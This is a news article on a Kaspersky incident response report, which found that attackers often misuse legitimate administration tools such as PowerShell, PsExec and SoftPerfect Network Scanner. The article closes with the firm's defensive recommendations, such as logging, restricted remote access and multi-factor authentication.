Cybercriminals widely use software developed for normal user activity, administrator tasks and system diagnostics to avoid getting caught quickly after carrying out their attacks, warns a new report by cybersecurity firm Kaspersky.
Almost a third of cyber attacks that the Kaspersky Global Emergency Response team investigated in 2019 involved legitimate remote management and administration tools.
In total, the analysis of anonymised data from incident response cases showed that 18 various legitimate tools were abused by attackers for malicious purposes, according to the company’s new ‘Incident Response Analytics Report’.
The most widely used one was PowerShell. This powerful administration tool can be used for many purposes, from gathering information to running malware.
Another tool, PsExec, was leveraged in 22 per cent of the attacks. This console application is intended for launching processes on remote endpoints.
This was followed by SoftPerfect Network Scanner, which is intended to retrieve information about network environments.
It is more difficult for security solutions to detect attacks conducted with legitimate tools because these actions can be both part of a planned cybercrime activity or a regular system administrator task.
“With these tools, attackers can gather information about corporate networks and then conduct lateral movement, change software and hardware settings or even carry out some form of malicious action,” Konstantin Sapronov, Head of Global Emergency Response Team at Kaspersky, said in a statement.
“It is not possible to exclude these tools for many reasons, however, properly deployed logging and monitoring systems will help to detect suspicious activity in the network and complex attacks at earlier stages,” Sapronov said.
To minimise the chances of remote management software being used to penetrate an infrastructure, organisations should restrict access to remote management tools from external IP addresses, the company recommended.
Moreover, they need to ensure that remote control interfaces can only be accessed from a limited number of endpoints, enforce a strict password policy for all IT systems and deploy multi-factor authentication, Kaspersky said.
It is better to follow the principle of offering staff limited privileges and grant high-privileged accounts only to those who need this to fulfil their job.